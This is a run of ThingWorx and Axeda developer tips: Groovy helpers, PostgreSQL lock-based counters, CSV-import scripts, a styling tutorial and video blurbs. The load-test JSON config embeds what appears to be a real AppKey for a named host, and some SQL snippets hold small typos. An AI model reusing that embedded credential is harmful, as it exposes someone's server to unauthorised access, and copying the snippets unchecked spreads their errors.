queryResult = eoSvc.findExtendedObjects(eoCriteria,  -1, -1, null)        return queryResult.first()     }     def advancedPropertySearch (Map searchcriteria){           def propCriteria = new PropertySearchCriteria()        propCriteria.setPropertyExpression(            PropertyExpressionFactory.and(                PropertyExpressionFactory.eq("year", searchcriteria.year),                     PropertyExpressionFactory.and(                         PropertyExpressionFactory.eq("month", searchcriteria.month),                                     PropertyExpressionFactory.eq("date", searchcriteria.date)                             )                    )             )         return propCriteria     }   static def extendedObjectToMap(ExtendedObject object) {     Map result = [:]     result.extendedObjectType = object?.extendedObjectType?.className     result.extendedObjectTypeId = object?.extendedObjectTypeId     result.id = object?.id     result.externalClientKey = object?.externalClientKey     result.internalObjectId = object?.internalObjectId     // build up the properties of the ExtendedObject.     result.properties = object?.properties.inject([:]) { target, property ->       target += [(property?.propertyType?.name): castPropertyValueToDefinedType(property)]     }     return result   }       static def extendedObjectTypeToMap(ExtendedObjectType objectType) {         Map result = [:]         result.className = objectType.className         result.id = objectType.id         result.displayName  = objectType.displayName         result.userDefined = objectType.userDefined         result.description = objectType.description         result.properties = objectType.propertyTypes.inject([]) { List list, PropertyType propertyType ->           list << [                   name: propertyType.name,                   id: propertyType.id,                   description: propertyType.description,                   dataType: propertyType.dataType.toString(),                   extendedObjectType: propertyType.extendedObjectType.className           ]         }         return result       }       private static def castPropertyValueToDefinedType(Property property) {         switch(property.propertyType.dataType) {           case PropertyDataType.Boolean:             return property.value as Boolean           case PropertyDataType.Date:             Calendar calendar = javax.xml.bind.DatatypeConverter.parseDateTime(property.value)             return calendar.getTime()           case PropertyDataType.Double:             return property.value as Double           case PropertyDataType.Integer:             return property.value as Long           case PropertyDataType.String:           default:             return property.value         }       }       static def removeExtendedObject(Long itemId) {         def eoSvc = new ServiceFactory().getExtendedObjectService()         eoSvc.deleteExtendedObject(itemId)       }       def removeUserExtendedObjects(User user) {         def queryresult = fetchUserExtendedObjects(user)         queryresult.each{                 eoSvc.deleteExtendedObject(it.id)         }       }      ExtendedObjectType findExtendedObjectType(String typeName) {     ExtendedObjectType userObjType = eoSvc.findExtendedObjectTypeByClassname(typeName)     return userObjType   }   ExtendedObjectType findOrCreateExtendedObjectType(String typeName) {     ExtendedObjectType type = findExtendedObjectType(typeName)     if (type == null) {       type = new ExtendedObjectType()       type.className = typeName       type.displayName = typeName       type.description = "Autocreated type for $typeName"       type = eoSvc.createExtendedObjectType(type)     }     return type   }
View full tip
Thread Safe Coding, Part 2: The Database Locker Approach and Comparison Written by Desheng Xu and edited by @vtielebein    Overview This is the second on this topic, describing an alternate approach to thread safe coding than one which requires the Java extension. The demo use case here is the same as in the previous post, and there is a section at the end comparing the two approaches.   Database Locker for Thread Safe Coding The database locker is an advanced topic, so some experience with the database thing is assumed. The following steps demonstrate how to be thread safe with a database thing.   Create New Database Instance, and New Table for counter It is strongly recommended that a new database instance be created outside of the ThingWorx database schema. This guide will NOT include instructions to create the new database instance. Use the following SQL commands to create a new table: DROP table IF EXISTS counters; CREATE TABLE counters ( name VARCHAR(100) unique , value integer NULL, PRIMARY KEY(name) ); INSERT INTO counters values('DemoCounter',0); This will create a new table called counters, initializing the first counter, called DemoCounter with the value 0. Create a Function to Increase and Return the New counter Value Use the following sample code to create a table lock function: CREATE OR REPLACE FUNCTION IncreaseCounter(coutner_name VARCHAR(100), OUT newvalue INTEGER) AS $$ BEGIN LOCK TABLE counters IN ACCESS EXCLUSIVE MODE; SELECT(SELECT value FROM counters WHERE name = $1) + 1 INTO newvalue; UPDATE counters SET value = newvalue WHERE name = $1; END; $$ language plpgsql;​ Or use the following SQL command to create a new row level locker function: CREATE OR REPLACE FUNCTION IncreaseCounter(counter_name VARCHAR(100), OUT newvalue INTEGER) AS $$ BEGIN SELECT value FROM counters WHERE name = $1 FOR UPDATE INTO newvalue; newvalue := newvalue + 1; UPDATE counters SET value = newvalue WHERE name = $1; END; $$ language plpgsql;   Create a Database Thing Create a thing with the template "database" within ThingWorx, and use the PostgreSQL Driver to connect to the new database instance created above. Create New Services in the Database Thing The service IncreaseCounterDB would be a SQL Query service: SELECT * FROM public.IncreaseCounter([[counter_name]);​ counter_name would be the input parameter, a STRING which is marked as required. The service GetCounterDB would be another SQL Query service: SELECT value FROM public.counters WHERE name=[[counter_name]] LIMIT 1; counter_name would be another input parameter, a STRING which is also marked as required. The service ResetCounterDB would be a SQL Command service: UPDATE public.counters SET value = 0 WHERE name=[[counter_name]]; counter_name is yet another input parameter, also a STRING and also required.  Wrap the Database Thing Service The above database thing service will return an InfoTable, but not an integer. If it's inconvenient to use an InfoTable, wrap the service up into a local Javascript service and return an integer value. The service IncreaseCounter is a wrap up of IncreaseCounterDB and returns an integer value: // result: INFOTABLE dataShape: "" var query_result = me.IncreaseCounterDB({ counter_name: 'DemoCounter' /* STRING */ }); var result = query_result.rows[0]["newvalue"]; Similarly wrap up GetCounter into GetCounterDB: // result: INFOTABLE dataShape: "SingleIntegerDatashape" var query_result = me.GetCounterDB({ counter_name: 'DemoCounter' /* STRING */ }); var result = query_result.rows[0]["value"];​ And ResetCounter into ResetCounterDB: // result: NUMBER var query_result = me.ResetCounterDB({ counter_name: 'DemoCounter' /* STRING */ }); var result = 0;​ Run the Test Again If necessary, head back to the previous post to obtain the tool. Then just change the end point and run a new test: { "host":"twx85.desheng.io", "port":443, "protocol":"https", "endpoint":"/Thingworx/Things/DatabaseDemo/services/IncreaseCounter", "headers":{ "Content-Type":"application/json", "Accept": "application/json", "AppKey":"5cafe6eb-adba-41df-a7d6-4fc8088125c1" }, "payload":{}, "round_break":50000, "req_break":0, "round_size":50, "total_round":20 }​ Run: Validate the Result Execute the service GetCounter to validate the result: Overall Performance Comparison The Java Extension performance looks the best here, but the database row lock will perform better if there are multiple counters.   InfoTable Type Property InfoTable properties have the same thread-safe challenges discussed previously, but they also have some additional challenges due to the way data change events are triggered. This is outside of the scope of this document, but it is worth a very brief mention here.    In general, the data change event for an InfoTable fires when the reference to the table is updated, and not the contents of the table. If the values of an InfoTable are updated directly, say by adding or removing a row, then the data change event will not be triggered because the value has technically not changed. Instead, the InfoTable has to be cloned, then modified, and then assigned back to the Thing so that the reference changes as well. Such additional considerations must be made when using other property types than those shown here. 
View full tip
  Convey information about IoT data effectively by customizing style definitions and implementing event-based logic   Guide Concept   This project will help you identify how you would like to create an experience for Users.   Following the steps in this guide, you will use color schemes to convey information quickly and effectively, for example to alert users of critical events. With ThingWorx Composer, you can implement Styles and States in your Mashups to enhance your user experience.   We will teach you how to create an affective IoT application experience that looks great and easy to navigate. How the UI is presented can influence users and their enjoyment of the application.   You'll learn how to   Create a Style Definition Customize Style Definitions Create and implement State Definitions Implement event-based state changes   NOTE: This guide's content aligns with ThingWorx 9.3. The estimated time to complete this guide is 60 minutes       Step 1: Completed Example   Download the StylesAndStates.xml attached to this guide.  Within this file, you will find Entities referenced in this lesson, including a finished application.  Import and utilize this file to see a finished example and return to it as a reference if you become stuck during this guide and need some extra help or clarification.   Keep in mind, this download uses the exact names for entities used in this tutorial. If you would like to import this example and also create entities on your own, change the names of the entities you create.     Step 2: Create Style Definition   A Style Definition is a collection of HTML styling elements that can be applied to a Widget just as you would apply a CSS definition to an HTML tag. With Style Definitions, you can control the look and feel, such as colors, fonts, and color context of individual Widgets in your Mashup.   In the ThingWorx Composer, click the + New at the top of the screen.   Select Style Definition in the dropdown.   Enter a name for the Style Definition, such as StyleDefinition. Set the Project to an existing Project (ie, PTCDefaultProject).   Click Style Information.   The Style Information page shows the options for images, colors, lines, and display text. See the table below for information on what each field controls.   6. Type PlaygroundBackground in the Display String field.   NOTE: If you go back to the HelloWorldPlayground, clear the Mashup Style property, then search for StyleDefinition again, you will see the PlaygroundBackground descriptive text.   7. Select Background Color. A color pallet will appear. Select White and click Select.   8. Select Text Color. A color pallet will appear. Select Black and click Select.   9. Click Save.     You have now created your first Style Definition. To ensure a consistent user experience, we recommend creating a Style Definition that you can use throughout your application.    Option                                    Description Display String Descriptive string that can be displayed to indicate the current applied style definition Background Color Background for charts, buttons, panels, etc Secondary Background Color Meant for widgets that support gradients Foreground Color Used for foreground characteristics such as button text and label text Font Bold For text, whether the text should be bold or not Font Italic For text, whether the text should be italicized or not Font Underline For text, whether the text should be underlined or not Image Add images Line Color Pen styling in charts Line Thickness Pen styling in charts Line Style Generally refers to borders. ThingWorx provides the following options: Solid, Dashed, Dotted, None Text Size Choose a font size from 9-72px   In the next part of this exercise, you’ll learn how to use Style Definitions to create an engaging experience for your application users.       Step 3: Customize Style Definitions   Open the HelloWorldPlayground Mashup in Composer, and click View Mashup.   It shows a Button that sends an Event to a Gauge Widget, which then updates a Line Chart.     Modify Style Definition   In this part of the lesson, we'll make some changes to this Mashup. We will use Style Definitions to change the background of the Mashup, change the colors used in the Line Chart in order information stand out, and add color to the Gauge Widget.   In the Explorer tab, select the Mashup. Select the Style Properties tab, then click the X button to clear the Style Mashup Properties.   When editing a Mashup, you can either use a Style Definition Thing that you created earlier OR you can click the wand in a style property for a Mashup or Widget followed by clicking the + Custom button to create a one-time-use style. 3. With the Style Property clear, enter the Style Definition you created in the last section. Update the Background Color to #FF9082 to have the color pop in the Mashup.   4. Click Save and View Mashup to see the changes. You have now updated the background for the HelloWorldPlayground. The style properties you define in the Style Definition will be consitent for any Mashup that references this Style Definition. Change the style around or create a custom style and see the changes in the Mashup. Below is what we'll be working to create. Get ideas of things you might want to see differently in your styling.     Customize Widget Style   ThingWorx provides a default Style Definition for many of its Widgets. Before editing the Style Definitions of a Widget, click the Style Definition property then click View. This enables you to see what the current values are and what you might want to change. If the changes are slight, create a copy of the original Style Definition and update the new version.   Until you are sure of the color schemes you would like to implement, use the default Style Definitions as a guide when creating your own versions.   Default Style Definitions   Next, we will update the colors and style of the Line Chart.   Open the HelloWorldPlayground and select the Line Chart in the Workspace pane. Click the Style Properties tab to see the chart styles section.   Update the Legend->Color property to Blue.     Customize Chart Style Theme   In this part of the lesson, we will update the Series1 and StyleTheme properties of the Line Chart. This is how you'll also set the colors for the chart titles.   The Series1 property will update the look and feel of the line for the count value being used. The Line Chart is a line graph, thus the only property you need to change is the Line Color property.   The StyleTheme property will update the background look of the Line Chart grid.   Clear the StyleTheme and click the + button to create a new theme. Create a theme with the name CustomTheme.   Click the Style tab and edit the feel of the items as you see fit.   After open the Style Theme to be editable, click on colors. Here you'll see all the options and fields that you can make up your own color options and be as conservative as you like or as free as you like.     Click Text Colors, then click on the Grids and Lists tab on the right. This is where we will be shaping our colors for the chart. When you're done with this, update the Core Colors section to make your mashup pop even more.     You may also notice a more focused method of updating grids and lists. In the below Elements section, you'll have a more focused experience for updated.     NOTE: As an extension, after completing the previous steps, try to use Style Definitions to customize the sections of the UI on your own.     Click here to view Part 2 of this guide.
View full tip
These code snippets illustrate parsing CSV files and populating the Axeda Enterprise with data, locations and organizations.  These files are incoming to the Axeda Platform. Note:  These snippets do NOT handle null values in the CSV due to the lack of a CSV parsing library.  Workaround is to populate empty values with an empty or null signifier (such as a blank space) and test for these on the Groovy side. Code Snippets: CSV file to Data Items CSV file to Location Organization Script Name: CSV file to Data Items Description: Executed from an expression rule with file hint "datainsert", takes a CSV file and adds data based on values. Parameters: OPTIONAL - only needed for debugging modelName - (OPTIONAL) Str - name of the model serialNumber - (OPTIONAL) Str - name of the serial number import com.axeda.drm.sdk.Context import com.axeda.drm.sdk.device.DeviceFinder import com.axeda.drm.sdk.device.ModelFinder import com.axeda.drm.sdk.device.DataItemFinder import com.axeda.drm.sdk.device.DataItem import com.axeda.drm.sdk.data.DataValueEntry import java.util.regex.Pattern import groovy.json.* import com.axeda.drm.services.device.DataItemType import net.sf.json.JSONObject /** * CSVToData.groovy * ----------------------- * * Executed from an expression rule with file hint "datainsert", takes a CSV file and adds data based on values. * * @note  There must be a column with "model" and one with "serial".  The rest of the columns should be data item names with values * in the rows. DOES NOT handle null values in CSV.  Workaround is to insert blank spaces in null values and test for those on the Groovy side. * Solution would be to add a library for CSV parsing such as open csv. * * @params - only needed if NOT executed from expression rule - primarily for debugging * modelName - (OPTIONAL) Str - name of the model * serialNumber - (OPTIONAL) Str - name of the serial number * * */ /** * initialize our global variables * json = the contents of our response * infoString = a stringBuilder used to collect debug information during the script * contentType = the content type we will return * scriptname = The name of this Script, used in multiple places */ def json = new groovy.json.JsonBuilder() def infoString = new StringBuilder() def contentType = "application/json" def scriptName = "CSVToData.groovy" def root = ["result":["items":[]]] def columns = [] try {   Context CONTEXT = Context.getSDKContext()   def modelIndex   def serialIndex   // initialize Model and Device Finders   ModelFinder modelFinder = new ModelFinder(CONTEXT)   DeviceFinder deviceFinder = new DeviceFinder(CONTEXT)   // implicit object compressedFile   File file = compressedFile.getFiles()[0].extractFile() /* //begin non-expression rule code, useful for debugging     File file     modelFinder.setName(Request.parameters.modelname)               def model1 = modelFinder.find()     deviceFinder.setSerialNumber(Request.parameters.serialNumber)     deviceFinder.setModel(model1)     def d = deviceFinder.find()      UploadedFileFinder uff = new UploadedFileFinder(CONTEXT)     uff.device = d     def ufiles = uff.findAll()     UploadedFile ufile     if (ufiles.size() > 0) {         ufile = ufiles[0]         file = ufile.extractFile()     }          */ //end non-expression rule code   file.eachLine {line ->       def row = line.tokenize(',')          // set the column headings       if (columns.size() == 0){         columns = row              // find model and serial index, assumes there's a column that has "model" and "serial", otherwise take columns 0 and 1         def modelpatt = Pattern.compile(/[A-Za-z_\-]{0,}model[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)         def serialpatt = Pattern.compile(/[A-Za-z_\-]{0,}serial[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)         modelIndex = columns.findIndexOf{ it ==~ modelpatt } > -1 ? columns.findIndexOf{ it ==~ modelpatt } : 0         serialIndex = columns.findIndexOf{ it ==~ serialpatt } > -1 ? columns.findIndexOf{ it ==~ serialpatt } : 1            }       // otherwise populate data       else {                  modelFinder.setName(row.get(modelIndex))           def model = modelFinder.find()                  deviceFinder.setModel(model)           deviceFinder.setSerialNumber(row.get(serialIndex))                  def device = deviceFinder.find()                  def assetInfo = [                     "model": model.name,                     "serial": device.serialNumber,                     "data":[]                     ]                  row.eachWithIndex{ item, index ->               if (index != modelIndex && index != serialIndex){                 def dataItemName = columns[index].replace(" ","")                 DataItemFinder dif = new DataItemFinder(CONTEXT);                 dif.setDataItemName(dataItemName);                 dif.setModel(model);                 DataItem dataItem = dif.find();                              if (dataItem){                     if (item.isNumber()){                        item = Double.valueOf(item)                     }                     DataValueEntry dve = new DataValueEntry(CONTEXT, device, dataItem, item)                     dve.store()                 }                 else {                     DataItem newDataItem                     if (item.isNumber()){                         newDataItem = new DataItem(CONTEXT, model,DataItemType.ANALOG, dataItemName)                         item = Double.valueOf(item)                     }                     else {                        newDataItem = new DataItem(CONTEXT, model,DataItemType.STRING, dataItemName)                     }                    newDataItem.store()                    DataValueEntry dve = new DataValueEntry(CONTEXT, device, newDataItem, item)                     dve.store()                 }                 assetInfo.data << [                         "name": dataItemName,                         "value": item                     ]                            }               root.result.items << assetInfo           }              }   }   logger.info(JSONObject.fromObject(root).toString(2)) } catch (Exception e) {     processException(scriptName,json,e) } //return ['Content-Type': 'application/json', 'Content': JSONObject.fromObject(root).toString(2)] /*     Processes the contents of an Exception and add it to the Errors collection     @param json The markup builder */ private def processException(String scriptName, JsonBuilder json, Exception e) {     // catch the exception output     def logStringWriter = new StringWriter()     e.printStackTrace(new PrintWriter(logStringWriter))     logger.error("Exception occurred in ${scriptName}: ${logStringWriter.toString()}")     /*         Construct the error response         - errorCode Will be an element from an agreed upon enum         - errorMessage The text of the exception      */     json.errors  {         error {             message     "[${scriptName}]: " + e.getMessage()             timestamp   "${System.currentTimeMillis()}"         }     }     return json } Script Name: CSV file to Location Organization Description: Executed from an expression rule with file hint "locorginsert", takes a CSV file and adds orgs and locations based on values. Parameters: OPTIONAL - only needed for debugging modelName - (OPTIONAL) Str - name of the model serialNumber - (OPTIONAL) Str - name of the serial number import com.axeda.drm.sdk.Context import com.axeda.drm.sdk.device.DeviceFinder import com.axeda.drm.sdk.device.ModelFinder import com.axeda.drm.sdk.device.DataItemFinder import com.axeda.drm.sdk.device.DataItem import com.axeda.drm.sdk.data.DataValueEntry import java.util.regex.Pattern import groovy.json.* import com.axeda.drm.services.device.DataItemType import net.sf.json.JSONObject import com.axeda.drm.sdk.contact.Organization import com.axeda.drm.sdk.contact.Location import com.axeda.drm.sdk.contact.OrganizationFinder import com.axeda.drm.sdk.contact.LocationFinder import com.axeda.drm.sdk.data.UploadedFile import com.axeda.drm.sdk.data.UploadedFileFinder /** * CSVToLocOrg.groovy * ----------------------- * * Executed from an expression rule with file hint "locorginsert", takes a CSV file and adds orgs and locations based on values. * * @note  There must be a column with "model" and one with "serial".  The rest of the columns should be either parts of a * location or an organization.  The location parts columns should be prefixed with the org# that they correspond to. * DOES NOT handle null values in CSV.  Workaround is to insert blank spaces in null values and test for those on the Groovy side. * Solution would be to add a library for CSV parsing such as open csv. * * @params - only needed if NOT executed from expression rule - primarily for debugging * modelName - (OPTIONAL) Str - name of the model * serialNumber - (OPTIONAL) Str - name of the serial number * * * */ /** * initialize our global variables * json = the contents of our response * infoString = a stringBuilder used to collect debug information during the script * contentType = the content type we will return * scriptname = The name of this Script, used in multiple places */ def json = new groovy.json.JsonBuilder() def infoString = new StringBuilder() def contentType = "application/json" def scriptName = "CSVToLocOrg.groovy" def root = ["result":["items":[]]] def columns = [] try {   Context CONTEXT = Context.getSDKContext()   def modelIndex   def serialIndex   def locIndices = [:]   def locKeys = ["line1","line2", "address1", "address2", "city","state","zip","country", "org"]   // initialize Finders   ModelFinder modelFinder = new ModelFinder(CONTEXT)   DeviceFinder deviceFinder = new DeviceFinder(CONTEXT)   LocationFinder locationFinder = new LocationFinder(CONTEXT)   OrganizationFinder organizationFinder = new OrganizationFinder(CONTEXT)   // implicit object compressedFile   File file = compressedFile.getFiles()[0].extractFile()   /* //begin non-expression rule code, useful for debugging     File file     modelFinder.setName(Request.parameters.modelname)               def model1 = modelFinder.find()     deviceFinder.setSerialNumber(Request.parameters.serialNumber)     deviceFinder.setModel(model1)     def d = deviceFinder.find()      UploadedFileFinder uff = new UploadedFileFinder(CONTEXT)     uff.device = d     def ufiles = uff.findAll()     UploadedFile ufile     if (ufiles.size() > 0) {         ufile = ufiles[0]         file = ufile.extractFile()     }           */ //end non-expression rule code   file.eachLine {line ->       def row = line.tokenize(',')       // set the column headings       if (columns.size() == 0){         columns = row         // find model and serial index, assumes there's a column that has "model" and "serial", otherwise take columns 0 and 1         def modelpatt = Pattern.compile(/[A-Za-z_\-]{0,}model[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)         def serialpatt = Pattern.compile(/[A-Za-z_\-]{0,}serial[A-Za-z_\-]{0,}/, Pattern.CASE_INSENSITIVE)         modelIndex = columns.findIndexOf{ it ==~ modelpatt } > -1 ? columns.findIndexOf{ it ==~ modelpatt } : 0         serialIndex = columns.findIndexOf{ it ==~ serialpatt } > -1 ? columns.findIndexOf{ it ==~ serialpatt } : 1               locKeys.each{ key ->             // construct a regex for each key and create a map for finding/creating             def locPatt = Pattern.compile(/[A-Za-z0-9_\-]{0,}${key}[A-Za-z0-9_\-]{0,}/, Pattern.CASE_INSENSITIVE)             def colIndex = columns.findIndexOf{                     def match = it =~ locPatt                     if (match){                         return match?.getAt(0)                     }                 }                       if (colIndex > -1){                 locIndices[colIndex] = key             }         }       }       // otherwise populate data       else {           modelFinder.setName(row.get(modelIndex))           def model = modelFinder.find()           deviceFinder.setModel(model)           deviceFinder.setSerialNumber(row.get(serialIndex))           def device = deviceFinder.find()           def assetInfo = [                     "model": model.name,                     "serial": device.serialNumber,                     "locs":[]                     ]                   def locMap = [:]           def orgName           def locKey           def locBool = false // make sure we get some criteria           row.eachWithIndex{ item, index ->                            if (index != modelIndex && index != serialIndex && item && item != ""){                   locKey = locIndices[index]                                   if (locKey){                       locBool = true                       if (locKey == "address1"){                         locKey = "line1"                       }                       if (locKey == "address2"){                         locKey = "line2"                       }                       if (locKey == "org"){                             orgName = item                       }                       // don't execute if we've got an organization key                       else {                           // for finding                           locationFinder[locKey] = item                           // for creating (if needed)                           locMap[locKey] = item                       }                   }                               }           }                   assetInfo.org           Organization org                   if (orgName){               organizationFinder.setName(orgName)               org = organizationFinder.find()                           if (!org){                 org = new Organization(CONTEXT, orgName)                 org.store()                  }                       }                  Location loc           if (locBool){               logger.info("with bool")             loc = locationFinder.find()             logger.info(loc?.name)           }                   if (!loc){                          def line1 = locMap["line1"]                           def name = line1?.replace(" ","")?.replace(/\./,"")?.replace("_","") + "_Loc"                           def line2 = locMap["line2"]               def city = locMap["city"]               def state = locMap["state"]               def zip = locMap["zip"]               def country = locMap["country"]                           if (line1 && city){                loc = new Location(CONTEXT,name,line1,line2,city,state,zip,country)                loc.store()                                         }                           if (loc && org){                   org.addLocation(loc)                   org.store()               }                       }                   assetInfo.locs << [                    "name": loc.name,                     "line1": loc.line1,                     "line2": loc.line2,                     "city": loc.city,                     "state": loc.state,                     "zip": loc.zip,                     "country": loc.country                                      ]                    assetInfo.org = [                         "name": org.name                                       ]           root.result.items << assetInfo       }   }   logger.info(JSONObject.fromObject(root).toString(2)) } catch (Exception e) {     processException(scriptName,json,e) } //return ['Content-Type': 'application/json', 'Content': JSONObject.fromObject(root).toString(2)] /*     Processes the contents of an Exception and add it to the Errors collection     @param json The markup builder */ private def processException(String scriptName, JsonBuilder json, Exception e) {     // catch the exception output     def logStringWriter = new StringWriter()     e.printStackTrace(new PrintWriter(logStringWriter))     logger.error("Exception occurred in ${scriptName}: ${logStringWriter.toString()}")     /*         Construct the error response         - errorCode Will be an element from an agreed upon enum         - errorMessage The text of the exception      */     json.errors  {         error {             message     "[${scriptName}]: " + e.getMessage()             timestamp   "${System.currentTimeMillis()}"         }     }     return json }
View full tip
Video Author:                     Christophe Morfin Original Post Date:            October 6, 2017 Applicable Releases:        ThingWorx Analytics 8.1   Description: This video covers the new features of ThingWorx Analytics Builder 8.1      
View full tip
Video Author:                     Asia Garrouj Original Post Date:            March 31, 2017 Applicable Releases:        ThingWorx Analytics 7.4 to 8.1   Description: This video is the first of a two part video series walking thru the configuration of Analysis Event which is applied for Real-Time Scoring.  This 1st video demonstrates how to create a Template and Thing which allows for the prediction model to score in real-time.   Note: This video is intended for demo purposes.  Customers who already have ThingWorx should already have their properties set-up.  In this case, you will need to configure the Analysis Event, which is demonstrated in the second part of this video series.    
View full tip
Video Author:                     Asia Garrouj Original Post Date:            March 31, 2017 Applicable Releases:        ThingWorx Analytics 7.4 to 8.1   Description: This video will walk you through the first steps on how to set-up Analytics Manager for Real-Time Scoring and demonstrate how to share your predictive model from Analytics Builder into Analytics Manager, as well as to test the shared model.    
View full tip
Welcome to the ThingWorx Service Apps Community! The ThingWorx Service Apps are easy to deploy, pre-configured role-based starter apps that are built on PTC’s industry-leading IoT platform, ThingWorx. The Asset Advisor for Service provides the ability to remotely identify, diagnose, and resolve service issues for a proactive maintenance approach.   A. Sign up: PTC account credentials are needed to participate in the ThingWorx Community. If you have not yet registered a PTC eSupport account, start with the Basic Account Creation page.   B. Download: Import as a ThingWorx Extension (for users with a ThingWorx SCP entitlement-- including PTC employees, and PTC Partners): ThingWorx Service Apps can be imported as a ThingWorx extension into an existing ThingWorx Platform install (v8.1.0). To locate the download, open the PTC Software Download Page and expand the following folders:   PTC Smart Connected Applications | Release APPs | ThingWorx Service Apps Extension | Most Recent Datacode   C. Learn Find helpful documentation in PTC Reference Documents.   D. Get help / give feedback / interact Use the ThingWorx Service Apps Community page as a resource to find documentation, peruse past forum threads, or post a question to start a discussion! For advanced troubleshooting, licensed users are encouraged to submit support tickets to the PTC My eSupport portal.
View full tip
  Learn how to create solutions the can help take you to the next level     Guide Concept   This project will introduce more complex aspects of the ThingWorx application and solution building.   Following the steps in this guide, you will develop your own IoT application or get a jump start in how to utilize ThingWorx for your needs.   We will teach you how to create a focused rules engine or service level logic to be used with the ThingWorx Platform.     You'll learn how to   Create automated processing, data, and endpoints that can handle that data without manual interaction Use services, alerts, and subscriptions to increase performance Begin making your data model and cornerstone entities to understand how a complex business logic is built   NOTE:  The estimated time to complete this guide is 60 minutes     Step 1: Completed Example   Download the attached FoodIndustry.zip and extract/import the contents. These are to be used as you work through this learning path. For the completed example, download the FoodIndustryComplete.zip. Unzip the download and import the Entities included.   In this tutorial we walk you through a real-world scenario for a food company looking to improve their processes. We manufacture the best sausages in town! We sell directly to people and through participating store locations. The focus will be to provide meaningful data for decision making, constant updates on food quality, logistics, transparency, and safety. See the below table for the list of mashups that we will create in this guide and included in the download.    Name                           Description Fizos.LandingPage The main page that showcases highlights and possibly important information Fizos.Deliveries A look into product delivery and logistics Fizos.Alerts Details about any important actionable information Fizos.Factory.User A user to be used for our automated process   There is a large set of Entities provided in this download. The application created in this guide is a part of a final version of what we will create throughout this learning path. If you have not learned about Services, Events/Alerts, and Subscriptions, please take a walk through our Implementing Services, Events, and Subscriptions.   This guide will begin the base of our data model, create data for our factories, and show how we can create automated processes using that data. We will then expand on these items as we move forward in this learning path.     Step 2: Utilizing IoT in the Food Industry   Whenever creating a product in ThingWorx, you should evaluate whether to create them using the data model (Things, Thing Templates, Thing Shapes, etc) or create them using Data Tables and Data Shapes. You have to decide the method that works best for you. One way to think about this is whether to have a single ThingWorx entity to encapsulate your product data OR having so many products (especially when easily volatile), that you rather track it at a higher level.   In our scenario, we won't need to track sausages as the individual level, so we can track the machines creating, holding, and packaging them. This also allows for us to run analytics on the data and export the data into our favorite tools to further process the data.   In the ThingWorx Composer, click the + New in the top left of the screen.   Select Data Shape in the dropdown.     3. In the name field, enter Fizos.DataShapes.Products. This data shape will form high level information about our differing products as a whole. 4. Set the Project (ie, PTCDefaultProject) and click Save to store all changes.     5. Click on the Field Definitions tab. 6. Click the + Add button and enter Name in the Name field of the new Field Definition.    7. Setup your Field Definitions to match the below definitions:  Name      Base Type       Aspects ID Integer Primary Key. Default 0. Minimum 0. Name String N/A State String N/A SKU String N/A Price Number Minimum 0. Mass Number Default 0. Minimum 0. Volume Number Default 0. Minimum 0.     We now have the data shape for products. We can go two different routes here as we create the data table for the products. We can make one data table for ALL company products or we can create a data table for each machine that houses these products. If you wanted the latter options, you could have the machine properties and services assocoated directly on the data table. This is a great option to condense the number of entities being used.   The level of granularity or simplicity is up to you. For this guide, we'll keep things simple and have one data table for all products. When we create the machine entities, we will have a table of the product IDs to help keep track of what products are contained in the machine. In the ThingWorx Composer, click the + New in the top left of the screen.   Select Data Table in the dropdown and select Data Table in the prompt.   In the pop-up, select Data Table.   In the name field, enter Fizos.DataTables.Products. All of our product line will fit this abstract entity. For the Data Shape field, select Fizos.DataShapes.Products. Set the Project field with an existing Project (ie, PTCDefaultProject) and click Save to store all changes.   We now have our setup complete for company products. Now let's create a DataShape for any Event involving this product template. In the ThingWorx Composer, click the + New in the top left of the screen.   Select Data Shape in the dropdown.   In the name field, enter Fizos.ProductsEvent and in the Project field, select an existing Project (ie, PTCDefaultProject). All of our product line will use this DataShape as an alert/event. Click Save to store all changes, then click Edit. Performed the steps used earlier to create the below properties for the Fizos.ProductsEvent Data Shape:  Name           Base Type        Aspects State String N/A SKU String N/A Price Number Minimum 0. Name String N/A     Now let's create a Thing Template, Stream, and a ValueStream to track some of what is happening with our products at a high level. The ValueStream will automatically track our data. The Stream, we will add data in the latter sections. In the ThingWorx Composer, click the + New in the top left of the screen.   Select Thing Template in the dropdown.   3. In the name field, enter Fizos.Products as the name and GenericThing as the Base Thing Template. 4. Select a Project (ie, PTCDefaultProject) and click Save to store all changes.       Now, our new Stream. In the ThingWorx Composer, click the + New in the top left of the screen.   Select Stream in the dropdown.   3. Select Stream in the pop-up.   4. In the name field, enter Fizos.ProductsStream and set the Project field (ie, PTCDefaultProject). 5. In the Data Shape field, select Fizos.ProductsEvent.   6. Click Save to store all changes.   Now, the Value Stream.   In the ThingWorx Composer, click the + New in the top left of the screen.   Select Value Stream in the dropdown.   3. Select ValueStream in the pop-up.   4. In the name field, enter Fizos.ProductsValueStream. 5. Set the Project field (ie, PTCDefaultProject) and click Save to store all changes.   6. Open the Fizos.Products Thing Template and set the Fizos.ProductsValueStream as the Value Stream.   We're all set with high level tracking of all of our products. At this point, we can start the creation of the entity that will help provide the business logic for all products. In the ThingWorx Composer, click the + New in the top left of the screen.   Select Thing in the dropdown.   In the name field, enter Fizos.ProductsBusinessLogic. All of our product line will fit this abstract entity. For the Base Thing Template field, select GenericThing and set the Project field to an existing Project (ie, PTCDefaultProject). Click Save to store all changes.   Click on the Services tab. Click the + Add button and create the two Services below.  Name                          InputReturn Type           Override Async  Desc InspectFactory Integer - factoryID Nothing Yes Yes Start an inspection for a specific factory ReceiveInspection JSON - report/ String - guid Nothing Yes Yes Log/Store an inspection for a specific factory   At this point, you have the building blocks to begin your industry business logic and rules engine. In the next section, we'll do more development and further build out our model.     Click here to view Part 2 of this guide.  
View full tip
